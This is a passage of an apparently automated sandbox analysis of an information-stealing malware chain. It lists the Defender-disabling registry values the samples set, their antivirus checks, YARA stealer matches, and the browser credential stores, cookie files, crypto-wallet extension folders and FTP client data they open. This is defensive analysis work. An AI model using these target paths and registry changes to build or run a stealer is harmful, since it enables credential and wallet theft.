                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F5CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_00F5CBEA
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C12517 GetTimeZoneInformation,6_2_00C12517
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Lowering of HIPS / PFW / Operating System Security Settings

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
                          Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableIOAVProtection 1
                          Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRealtimeMonitoring 1
                          Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\NotificationsRegistry value created: DisableNotifications 1
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeRegistry value created: TamperProtection 0
                          Source: d0d9725343.exe, 0000000B.00000002.3094417595.0000000003849000.00000004.00000800.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000003.3092005941.000000000103D000.00000004.00000020.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000002.3093560739.000000000103D000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3218675497.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: 176986cc9c.exe, 0000000D.00000003.3218627779.00000000012CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \MsMpeng.exe
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 0.2.file.exe.f40000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.skotes.exe.bd0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 6.2.skotes.exe.bd0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.skotes.exe.bd0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.2160499744.0000000000F41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.2183253576.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.2189953955.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 3981530833.exe PID: 1776, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 176986cc9c.exe PID: 5440, type: MEMORYSTR
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Source: Yara matchFile source: 0000000E.00000002.3180012118.0000000000A81000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000E.00000002.3190013417.000000000145E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000E.00000003.3122477181.00000000050D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001E.00000003.3258280474.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001E.00000002.3351423687.0000000000728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001E.00000002.3354435913.0000000000A81000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: f570600774.exe PID: 5936, type: MEMORYSTR
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: 176986cc9c.exe, 0000000D.00000003.3197174045.00000000012CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets
                          Source: 176986cc9c.exe, 0000000D.00000003.3197174045.00000000012CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
                          Source: d0d9725343.exe, 0000000B.00000003.3092005941.0000000000FD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 0},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d"jMp
                          Source: d0d9725343.exe, 0000000B.00000003.2979875499.0000000001045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                          Source: 176986cc9c.exe, 0000000D.00000003.3197174045.00000000012CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                          Source: d0d9725343.exe, 0000000B.00000003.2979897591.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3f
                          Source: 176986cc9c.exe, 0000000F.00000003.3367486748.00000000005EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                          Source: d0d9725343.exe, 0000000B.00000003.2979875499.0000000001045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                          Source: d0d9725343.exe, 0000000B.00000003.2979875499.0000000001045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
